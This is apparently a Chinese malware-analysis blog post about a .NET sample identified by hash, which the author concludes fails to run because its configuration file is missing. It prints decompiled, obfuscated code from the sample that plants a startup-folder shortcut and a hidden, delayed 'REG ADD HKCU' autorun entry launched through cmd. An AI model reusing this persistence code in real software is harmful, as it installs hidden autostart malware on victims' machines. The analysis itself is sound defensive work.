			string text = Environment.GetFolderPath((Environment.SpecialFolder)(((int.Parse("-1662360029") ^ int.Parse("1662352573")) + Convert.ToInt32(72774.0 - Math.Truncate(24258.0)) / <Module>.ValidateKeyView(int.Parse("3")) + (int.Parse("435685617") ^ int.Parse("435695380")) / <Module>.ValidateKeyView(int.Parse("13"))) * (Convert.ToInt32((double)-111662f) + Convert.ToInt32(54118.22270696087 + Math.Tan(27135.5)) / <Module>.ValidateKeyView(int.Parse("8")) + Convert.ToInt32((double)57392f) / <Module>.ValidateKeyView(int.Parse("11"))))) + "\\" + Path.ChangeExtension(Path.GetFileName(string_0), ".lnk");
			bool result;
			if ((File.Exists(text) ? 1 : 0) == Convert.ToInt32((double)-120906f) + Convert.ToInt32(81849.85600839289 - Math.Sin(40924.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(19529.0 + Math.Round(19528.5)) / <Module>.ValidateKeyView(int.Parse("5")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length)
			{
				result = Class12_Startup.EndAddr(text, string_0);
			}
			else
			{
				result = ((int.Parse("-1543707215") ^ int.Parse("1543714655")) + Convert.ToInt32(130967.0 - Math.Round(43655.5)) / <Module>.ValidateKeyView(int.Parse("13")) - Convert.ToInt32(75771.96340220865 - Math.Cos(37886.0)) / <Module>.ValidateKeyView(int.Parse("10")) != 0);
			}
			return result;
		}

		// Token: 0x06000118 RID: 280 RVA: 0x0001EF40 File Offset: 0x0001D140
		private static bool EndAddr(string string_0, string string_1)
		{
			try
			{
				object objectValue = RuntimeHelpers.GetObjectValue(Activator.CreateInstance(Type.GetTypeFromCLSID(new Guid("72C24DD5-D70A-438B-8A42-98424B88AFB8"))));
				try
				{
					object instance = objectValue;
					Type type = null;
					string memberName = "CreateShortcut";
					object[] array = new object[(int.Parse("-1895988106") ^ int.Parse("1895964075")) + Convert.ToInt32(46540.0 + Math.Truncate(46539.5)) / <Module>.ValidateKeyView(int.Parse("1")) - Convert.ToInt32(100397.0 - Math.Ceiling(33465.5)) / <Module>.ValidateKeyView(int.Parse("2"))];
					array[Convert.ToInt32((double)-35910f) + Convert.ToInt32(8856.587538226117 + Math.Cos(4428.5)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(27055.55674404852 + Math.Tan(13526.5)) / <Module>.ValidateKeyView(int.Parse("1")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length] = string_0;
					object[] array2 = array;
					string[] argumentNames = null;
					Type[] typeArguments = null;
					bool[] array3 = new bool[(int.Parse("-242492809") ^ int.Parse("242534661")) + Convert.ToInt32(56867.0 + Math.Tanh(28434.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(1845.5 + Math.Abs(1845.5)) / <Module>.ValidateKeyView(int.Parse("10"))];
					array3[(int.Parse("-487234369") ^ int.Parse("487301002")) + Convert.ToInt32(43103.984831455695 - Math.Cos(21551.5)) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32((double)23660f) / <Module>.ValidateKeyView(int.Parse("14")) - Type.EmptyTypes.Length + Type.EmptyTypes.Length] = (Convert.ToInt32(11909.0 + Math.Round(11909.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32((double)10079f) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32(33895.0 + Math.Tanh(16948.0)) / <Module>.ValidateKeyView(int.Parse("1")) != 0);
					bool[] array4 = array3;
					object obj = NewLateBinding.LateGet(instance, type, memberName, array, argumentNames, typeArguments, array3);
					if (array4[Convert.ToInt32(20887.0 + Math.Abs(20887.0)) / <Module>.ValidateKeyView(int.Parse("8")) + (int.Parse("1450761171") ^ int.Parse("1450727027")) / <Module>.ValidateKeyView(int.Parse("2")) - Convert.ToInt32(78227.52215065657 - Math.Sqrt(39015.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length])
					{
						string_0 = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array2[Convert.ToInt32((double)-9165f) + Convert.ToInt32((double)20283f) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(11117.951818134667 - Math.Cos(5559.0)) / <Module>.ValidateKeyView(int.Parse("11")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length]), typeof(string));
					}
					object objectValue2 = RuntimeHelpers.GetObjectValue(obj);
					try
					{
						object instance2 = objectValue2;
						Type type2 = null;
						string memberName2 = "TargetPath";
						object[] array5 = new object[Convert.ToInt32((double)-343f) + Convert.ToInt32(41512.54976434498 + Math.Tan(20756.0)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32(61752.0 - Math.Round(20584.0)) / <Module>.ValidateKeyView(int.Parse("8"))];
						array5[Convert.ToInt32((double)67238f) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32(1366.0 + Math.Truncate(1365.5)) / <Module>.ValidateKeyView(int.Parse("14")) - Convert.ToInt32((double)69969f) / <Module>.ValidateKeyView(int.Parse("3")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length] = string_1;
						NewLateBinding.LateSet(instance2, type2, memberName2, array5, null, null);
						object instance3 = objectValue2;
						Type type3 = null;
						string memberName3 = "WorkingDirectory";
						object[] array6 = new object[Convert.ToInt32(14924.872562366774 - Math.Tan(7462.0)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32(27867.859461327458 + Math.Cos(13933.5)) / <Module>.ValidateKeyView(int.Parse("2")) - Convert.ToInt32(21395.0 + Math.Truncate(21395.0)) / <Module>.ValidateKeyView(int.Parse("10"))];
						array6[Convert.ToInt32((double)-112984f) + Convert.ToInt32(32695.0 + Math.Ceiling(32695.0)) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32((double)47594f) / <Module>.ValidateKeyView(int.Parse("14")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length] = string_1;
						NewLateBinding.LateSet(instance3, type3, memberName3, array6, null, null);
						NewLateBinding.LateCall(objectValue2, null, "Save", new object[Convert.ToInt32((double)-133151f) + Convert.ToInt32(29711.0 + Math.Round(29710.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32((double)73730f) / <Module>.ValidateKeyView(int.Parse("1")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length], null, null, null, (int.Parse("-1531599926") ^ int.Parse("1531690413")) + Convert.ToInt32(80861.0 + Math.Tanh(40431.0)) / <Module>.ValidateKeyView(int.Parse("14")) + Convert.ToInt32(21214.0 + Math.Abs(21214.0)) / <Module>.ValidateKeyView(int.Parse("1")) != 0);
					}
					finally
					{
						Marshal.FinalReleaseComObject(RuntimeHelpers.GetObjectValue(objectValue2));
					}
				}
				finally
				{
					Marshal.FinalReleaseComObject(RuntimeHelpers.GetObjectValue(objectValue));
				}
				return Convert.ToInt32(13965.0 - Math.Truncate(4655.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(82742.80586871838 + Math.Cos(41371.0)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32((double)92051f) / <Module>.ValidateKeyView(int.Parse("13")) != 0;
			}
			catch (Exception ex)
			{
			}
			return Convert.ToInt32(58988.53022951354 + Math.Log10(29496.5)) / <Module>.ValidateKeyView(int.Parse("1")) + Convert.ToInt32(14443.0 + Math.Truncate(14442.5)) / <Module>.ValidateKeyView(int.Parse("14")) - Convert.ToInt32(87867.30944241263 + Math.Log(43939.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length != 0;
		}

		// Token: 0x06000119 RID: 281 RVA: 0x0001F744 File Offset: 0x0001D944
		private static void DontWriteAnything(string string_0, string string_1, string string_2)
		{
			int num = Convert.ToInt32((double)9766f) / <Module>.ValidateKeyView(int.Parse("3")) + Convert.ToInt32(24671.140469336275 + Math.Sin(12336.0)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(17219.0 + Math.Round(17219.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length;
			string[] array = new string[(Convert.ToInt32((double)-107374f) + Convert.ToInt32((double)64747f) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32((double)42636f) / <Module>.ValidateKeyView(int.Parse("5"))) * ((int.Parse("-675922721") ^ int.Parse("675917610")) + Convert.ToInt32(92703.90390270783 - Math.Cos(46351.5)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(65038.487829431506 + Math.Log10(32521.5)) / <Module>.ValidateKeyView(int.Parse("2")))];
			array[Convert.ToInt32((double)-175617f) + Convert.ToInt32(79404.99246461812 + Math.Sin(39702.0)) / <Module>.ValidateKeyView(int.Parse("10")) + (int.Parse("521541980") ^ int.Parse("521629321")) / <Module>.ValidateKeyView(int.Parse("14")) + Type.EmptyTypes.Length - Type.EmptyTypes.Length] = "REG ADD ";
			array[Convert.ToInt32((double)-86545f) + Convert.ToInt32(145230.0 - Math.Abs(48410.0)) / <Module>.ValidateKeyView(int.Parse("4")) - Convert.ToInt32(10274.879487822023 + Math.Cos(5137.0)) / <Module>.ValidateKeyView(int.Parse("2"))] = "\"HKCU\\" + string_0 + "\"";
			array[(Convert.ToInt32(40118.09141265462 - Math.Cos(20059.5)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32((double)42431f) / <Module>.ValidateKeyView(int.Parse("8")) - (int.Parse("2012817835") ^ int.Parse("2012769247")) / <Module>.ValidateKeyView(int.Parse("4"))) * (Convert.ToInt32(6129.0 + Math.Abs(6129.0)) / <Module>.ValidateKeyView(int.Parse("7")) + Convert.ToInt32(69824.98084182877 + Math.Sin(34912.5)) / <Module>.ValidateKeyView(int.Parse("6")) - Convert.ToInt32(123123.0 - Math.Round(41041.0)) / <Module>.ValidateKeyView(int.Parse("10")))] = " /f /v ";
			array[((int.Parse("-157731048") ^ int.Parse("157767075")) + Convert.ToInt32(142963.0 - Math.Truncate(47654.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(10499.56512584517 - Math.Log(5245.5)) / <Module>.ValidateKeyView(int.Parse("12"))) * (Convert.ToInt32((double)-63567f) + Convert.ToInt32(114301.5 - Math.Abs(38100.5)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32(12632.053301785229 + Math.Sin(6316.5)) / <Module>.ValidateKeyView(int.Parse("13")))] = "\"" + string_1 + "\"";
			array[(Convert.ToInt32((double)-99905f) + Convert.ToInt32(41727.945540788765 - Math.Log(20859.0)) / <Module>.ValidateKeyView(int.Parse("1")) + Convert.ToInt32(87287.0 - Math.Round(29095.5)) / <Module>.ValidateKeyView(int.Parse("6"))) * (Convert.ToInt32((double)-62966f) + Convert.ToInt32(21145.0 + Math.Ceiling(21145.0)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(20676.47757917575 - Math.Tan(10338.5)) / <Module>.ValidateKeyView(int.Parse("1")))] = " /t REG_SZ /d ";
			string[] array2 = array;
			array2[(Convert.ToInt32((double)-73656f) + Convert.ToInt32(24033.0 - Math.Truncate(8011.0)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(57634.54031355819 + Math.Log10(28819.5)) / <Module>.ValidateKeyView(int.Parse("10"))) * (Convert.ToInt32((double)-63764f) + Convert.ToInt32(29148.412662583894 + Math.Log(14579.0)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(34611.23813395729 - Math.Log10(17303.5)) / <Module>.ValidateKeyView(int.Parse("14")))] = null;
			array2[(Convert.ToInt32(10491.504885601247 - Math.Tan(5246.0)) / <Module>.ValidateKeyView(int.Parse("12")) + Convert.ToInt32(28645.0 + Math.Floor(28645.0)) / <Module>.ValidateKeyView(int.Parse("9")) - Convert.ToInt32(101662.5 - Math.Abs(33887.5)) / <Module>.ValidateKeyView(int.Parse("3"))) * (Convert.ToInt32(14720.742966535727 - Math.Tan(7360.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(17.0 + Math.Round(17.5)) / <Module>.ValidateKeyView(int.Parse("12")) - Convert.ToInt32((double)14755f) / <Module>.ValidateKeyView(int.Parse("5")))] = string_2;
			array2[((int.Parse("-1905992075") ^ int.Parse("1905959876")) + Convert.ToInt32(18126.994805559836 + Math.Tan(9063.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(80771.39374765242 + Math.Log10(40388.0)) / <Module>.ValidateKeyView(int.Parse("13"))) * (Convert.ToInt32(79501.54361120917 + Math.Tan(39751.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(6514.910057508764 + Math.Log(3261.5)) / <Module>.ValidateKeyView(int.Parse("5")) - Convert.ToInt32(86013.33076557449 + Math.Log(43012.0)) / <Module>.ValidateKeyView(int.Parse("3")))] = "\"";
			array2[((int.Parse("-1145493769") ^ int.Parse("1145451793")) + Convert.ToInt32((double)56347f) / <Module>.ValidateKeyView(int.Parse("5")) + Convert.ToInt32(4101.81919317079 - Math.Sin(2050.5)) / <Module>.ValidateKeyView(int.Parse("7"))) * (Convert.ToInt32((double)-141150f) + Convert.ToInt32(64057.5 - Math.Abs(21352.5)) / <Module>.ValidateKeyView(int.Parse("11")) + Convert.ToInt32(98446.86466984783 - Math.Cos(49223.0)) / <Module>.ValidateKeyView(int.Parse("11")))] = "\"";
			string str = (checked(Class6_GetOptions.InternalBinarySearch.ExecutionDelay + unchecked(new Random().Next(((int.Parse("128585495") ^ int.Parse("128590991")) / <Module>.ValidateKeyView(int.Parse("10")) + Convert.ToInt32(28927.0 - Math.Floor(9642.5)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(30441.0 - Math.Tanh(15220.0)) / <Module>.ValidateKeyView(int.Parse("6"))) * (Convert.ToInt32((double)-112778f) + Convert.ToInt32(20761.0 + Math.Abs(20761.0)) / <Module>.ValidateKeyView(int.Parse("13")) + Convert.ToInt32((double)71257f) / <Module>.ValidateKeyView(int.Parse("1"))), (Convert.ToInt32((double)-115314f) + Convert.ToInt32(144558.0 - Math.Floor(48186.0)) / <Module>.ValidateKeyView(int.Parse("7")) + Convert.ToInt32(18951.423662756893 + Math.Cos(9476.0)) / <Module>.ValidateKeyView(int.Parse("8"))) * (Convert.ToInt32((double)-58079f) + Convert.ToInt32(145313.0 - Math.Ceiling(48437.5)) / <Module>.ValidateKeyView(int.Parse("9")) - Convert.ToInt32(38804.87289947077 - Math.Log(19397.5)) / <Module>.ValidateKeyView(int.Parse("1"))))))).ToString() + " ";
			Class12_Startup.LOCALE_SISO639LANGNAME2("cmd", "/c ping 127.0.0.1 -n " + str + "> nul &&  " + string.Concat(array), Convert.ToInt32((double)-10971f) + Convert.ToInt32((double)71543f) / <Module>.ValidateKeyView(int.Parse("7")) - Convert.ToInt32(60572.0 - Math.Tanh(30285.5)) / <Module>.ValidateKeyView(int.Parse("3")) != 0);
		}

		// Token: 0x0600011A RID: 282 RVA: 0x00020220 File Offset: 0x0001E420
		internal static void LOCALE_SISO639LANGNAME2(string string_0, string string_1, bool bool_0)
		{
			int num = (int.Parse("-1913524470") ^ int.Parse("1913642619")) + Convert.ToInt32(68468.15533314795 - Math.Cos(34234.5)) / <Module>.ValidateKeyView(int.Parse("9")) + Convert.ToInt32(74919.0 - Math.Ceiling(24973.0)) / <Module>.ValidateKeyView(int.Parse("9")) + Type.EmptyTypes.Length + Type.EmptyTypes.Length;
			Class12_Startup.DateTimeOffset(string_0, string_1);
		}

		// Token: 0x0600011B RID: 283 RVA: 0x000202B8 File Offset: 0x0001E4B8
		private static void DateTimeOffset(string string_0, string string_1)
		{
			Process.Start(new ProcessStartInfo
			{
				FileName = string_0,
				Arguments = string_1,
				WindowStyle = (ProcessWindowStyle)(Convert.ToInt32((double)-74359f) + Convert.ToInt32((double)78320f) / <Module>.ValidateKeyView(int.Parse("6")) - Convert.ToInt32(5940.0 - Math.Abs(1980.0)) / <Module>.ValidateKeyView(int.Parse("7"))),
				CreateNoWindow = (Convert.ToInt32((double)-69394f) + Convert.ToInt32(31566.0 + Math.Truncate(31565.5)) / <Module>.ValidateKeyView(int.Parse("4")) + Convert.ToInt32(3132.0 + Math.Floor(3132.0)) / <Module>.ValidateKeyView(int.Parse("9")) != 0),
				UseShellExecute = (Convert.ToInt32((double)-124642f) + Convert.ToInt32(68329.0 + Math.Tanh(34165.0)) / <Module>.ValidateKeyView(int.Parse("6")) + Convert.ToInt32(84468.0 - Math.Truncate(28156.0)) / <Module>.ValidateKeyView(int.Parse("3")) - Type.EmptyTypes.Length - Type.EmptyTypes.Length != 0),
				RedirectStandardError = (Convert.ToInt32((double)-46178f) + Convert.ToInt32(67591.98330745602 + Math.Sin(33795.5)) / <Module>.ValidateKeyView(int.Parse("8")) - Convert.ToInt32(21308.530197642016 + Math.Sqrt(10706.0)) / <Module>.ValidateKeyView(int.Parse("3")) != 0)
			});
		}

		// Token: 0x0600011C RID: 284 RVA: 0x00011E59 File Offset: 0x00010059
		public static string smethod_0()
		{
			return ")mmk!kiic%";
		}

		// Token: 0x0600011D RID: 285 RVA: 0x00011E60 File Offset: 0x00010060
		public static int smethod_1()
		{
			return 77109389;
		}

		// Token: 0x0600011E RID: 286 RVA: 0x00011E67 File Offset: 0x00010067
		public static string smethod_2()
		{
			return "!aon!mkk@n";
		}

		// Token: 0x0600011F RID: 287 RVA: 0x00011D63 File Offset: 0x0000FF63
		public static int smethod_3()
		{
			return 19053177;
		}

		// Token: 0x06000120 RID: 288 RVA: 0x00011E6E File Offset: 0x0001006E
		public static string smethod_4()
		{
			return "c]$)%&d%&k";
		}

		// Token: 0x06000121 RID: 289 RVA: 0x00011E75 File Offset: 0x00010075
		public static int smethod_5()
		{
			return 31180742;
		}

		// Token: 0x06000122 RID: 290 RVA: 0x00011E7C File Offset: 0x0001007C
		public static string smethod_6()
		{
			return "%q)e]*!@ml";
		}

		// Token: 0x06000123 RID: 291 RVA: 0x00011E83 File Offset: 0x00010083
		public static int smethod_7()
		{
			return 76529586;
		}

		// Token: 0x06000124 RID: 292 RVA: 0x00011E8A File Offset: 0x0001008A
		public static string smethod_8()
		{
			return "^/bu$$g**n";
		}

		// Token: 0x06000125 RID: 293 RVA: 0x00011E91 File Offset: 0x00010091
		public static int smethod_9()
		{
			return 61914793;
		}

		// Token: 0x06000126 RID: 294 RVA: 0x00011E98 File Offset: 0x00010098
		public static string smethod_10()
		{
			return "%!%k^os@f!";
		}

		// Token: 0x06000127 RID: 295 RVA: 0x00011913 File Offset: 0x0000FB13
		public static int smethod_11()
		{
			return 38322046;
		}

		// Token: 0x06000128 RID: 296 RVA: 0x00011E9F File Offset: 0x0001009F
		public static string smethod_12()
		{
			return "ak)uag%^e@";
		}

		// Token: 0x06000129 RID: 297 RVA: 0x00011E60 File Offset: 0x00010060
		public static int smethod_13()
		{
			return 77109389;
		}

		// Token: 0x0600012A RID: 298 RVA: 0x00011EA6 File Offset: 0x000100A6
		public static string smethod_14()
		{
			return "/&dsv([]@#";
		}

		// Token: 0x0600012B RID: 299 RVA: 0x00011913 File Offset: 0x0000FB13
		public static int smethod_15()
		{
			return 38322046;
		}
	}
}

  好吧,看来反混下没有什么卵用,只能自己实际运行下看看了。

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_安全分析_04

 

运行:

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_安全分析_05

 通过反射的方式运行:

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_System_06

 因为是通过invoke去运行dll里的函数:在在 C# 中通过 P/Invoke 调用Win32 DLL这篇文中,详细介绍了P/Invoke的基本知识以及使用。

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_Windows_07

 

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_Windows_08

 

 

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_System_09

 追踪发现程序死在:new DataGridView这里

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_EXEC_10

 继续跟进是死在:

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_Windows_11

 

 

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_EXEC_12

 

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_安全分析_13

 

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_安全分析_14

 所以怀疑是环境的问题!我是中文环境!

 

.net这行代码运行出错:this.horizScrollBar.AccessibleName = SR.GetString("DataGridView_AccHorizontalScrollBarAccName");可能原因是什么?我是zh-CN环境。

 

ChatGPT回答

 

根据您提供的代码,错误似乎与资源字符串(Resource String)的获取有关。代码中的SR.GetString("DataGridView_AccHorizontalScrollBarAccName")是用于获取一个名为"DataGridView_AccHorizontalScrollBarAccName"的资源字符串。您提到您是在zh-CN环境下运行,这可能导致资源字符串查找失败,从而引发错误。

请确保以下几点以排除问题:

  1. 资源字符串存在且正确: 确保在您的代码中存在名为"DataGridView_AccHorizontalScrollBarAccName"的资源字符串,并且资源字符串的键名没有拼写错误或大小写问题。
  2. 本地化资源: 由于您是在zh-CN环境下运行,您需要确保存在针对中文环境的本地化资源。即使在zh-CN环境下,您的应用程序也应该提供相应的资源文件,以便在需要时加载适用于中文环境的资源字符串。
  3. 资源文件位置: 确保资源文件位于正确的位置,以便应用程序可以正确地找到和加载资源字符串。通常,资源文件会根据语言和区域的不同存储在不同的文件夹中。
  4. 资源字符串获取方式: 如果使用的是SR.GetString方法获取资源字符串,确保这个方法的实现能够正确地从资源文件中获取并返回对应的字符串。

 

好吧,我尝试使用英文环境,继续出错,在New Form时候报错,晕死:跟进去

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_Windows_15

 

最终可以确定是因为配置文件缺失导致程序无法运行。

关于.net程序的配置文件!

比如我们简单写一个程序:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;


namespace TestWindowsFormsApp
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            LoadSetting();
        }

        private void LoadSetting()
        {
            string enableFeatureValue = System.Configuration.ConfigurationManager.AppSettings.Get("EnableFeature");
            bool enableFeature = Convert.ToBoolean(enableFeatureValue);
            if (enableFeature)
            {
                MessageBox.Show("Feature is enabled!");
            }
            else
            {
                MessageBox.Show("Feature is disabled.");
            }
        }
    }
}

  

生成的程序:

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_EXEC_16

 

同时,该文件内容:

 

样本分析  99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b2eccbff066ce1d 由于.net程序配置文件缺失导致无法正常运行_System_17

自动生成了不少内容!

 

好了,知道了原因,如何修改该程序运行应该就明白了。

 



标签:0x00000000,exe,配置文件,int,Parse,99eddc2794077f97a5cfe3098f431c4cfc4fd6353957ee715b
From: https://blog.51cto.com/u_11908275/7408058

相关文章

  • 深入理解容器编排与Kubernetes
    什么是容器编排?容器编排是一种自动化和管理容器化应用程序的方法。它涉及到管理多个容器实例、负载均衡、自动伸缩、服务发现等。容器编排工具可以帮助开发人员和运维团队有效地部署、扩展和维护容器化应用程序。为什么使用容器编排?使用容器编排的好处包括:自动化扩展:容器编排工具......
  • 从软件工程师角度聊聊 Kubernetes
    作为软件工程师,我们应该熟悉K8s,尽管它有点像DevOps,但它能让我们更好地了解幕后发生的事情,让我们与部署工作更密切相关,更有责任感。本文将从软件工程师的角度探讨Kubernetes(K8s),我们将介绍其动机、原理和核心组件,助力于开发者们提升Kubernetes的专业知识水平,能更有信心地拥......
  • .NET应用多语言-葡萄牙语软件,如何处理本地化,特别是数字的转换和计算
    在葡萄牙语软件中,数字本地化通常涉及小数点和千位分隔符的使用。在葡萄牙语中,小数点用“,”表示,而不是英语中使用的“.”。千位分隔符通常是一个空格或一个点。例如:62.5,其实代表的不是62.5而是625M 为了正确地处理数字本地化,可以使用.NET框架中提供的CultureInfo类。此类允许......
  • qmake 配置文件中常见变量的含义
    qmake配置文件(通常是.pro文件)TARGET:指定项目的目标输出文件名,通常是可执行文件的名称。TEMPLATE:指定项目的类型,例如应用程序('app')或库('lib')。SOURCES:列出了项目中的源文件,包括C++源文件(.cpp)和其他支持的文件类型。FORMS:指定项目中使用的QtDesigner创建......
  • .netcore 使用iTextSharp生成pdf文件
     使用Nuget添加iTextSharp引用主要代码usingiTextSharp.text.pdf;usingiTextSharp.text;usingSystem.IO;usingAutoMapper;usingSystem.Linq;usingSystem.Drawing;usingstaticiTextSharp.text.Font;usingSystem.Text;namespaceWebApi.Common.Service......
  • Spikformer: When Spiking Neural Network Meets Transformer
    郑重声明:原文参见标题,如有侵权,请联系作者,将会撤销发布!PublishedasaconferencepaperatICLR2023(同大组工作) ABSTRACT我们考虑了两种生物学合理的结构,脉冲神经网络(SNN)和自注意机制。前者为深度学习提供了一种节能且事件驱动的范式,而后者则能够捕获特征依赖性,使Trans......
  • 使用Visual Studio实现.NET的应用程序设计
    1、首先当然是下载好VisualStudio软件啦!(2019版本)2、新建一个名为StuMis的解决方案3、在解决方案里面新建一个名为MK01的类库和一个名为MK02的类库右键解决方案,选择新建项目,选择类库:4、此时,其实StuMis并未引用到这两个类库我们需要为StuMis引用到这两个类库:右键引用,添......
  • Kubernetes Dashboard 认证时间延长
    近日,有同事反馈登录KubernetesDashboard竟然容易失效,需要再次认证。希望我们可以设置更长的时间。首先我们查询资料得知默认的Token失效时间是900秒,也就是15分钟,这意味着你每隔15分钟就要认证一次。//Expirationtime(inseconds)oftokensgeneratedbydashboard.Defaul......
  • .net core 请求网页的时候出现gzip压缩 respones返回的中文数据变成乱码
    解决方法:https://blog.csdn.net/lishenluo/article/details/105383323引用System.Text.Encoding.codePages包里面包含了解压缩转化中文gbkgb2312下面时具体的解压缩办法。publicstaticstringDecompressGzip(Streamstm){System.Text.Encoding.RegisterProvi......
  • .NET5学习笔记
    1、SDK 2、VS2019落落安装出错:网络-以太网-更改适配器网站-修改协议 安装板块:Web安装......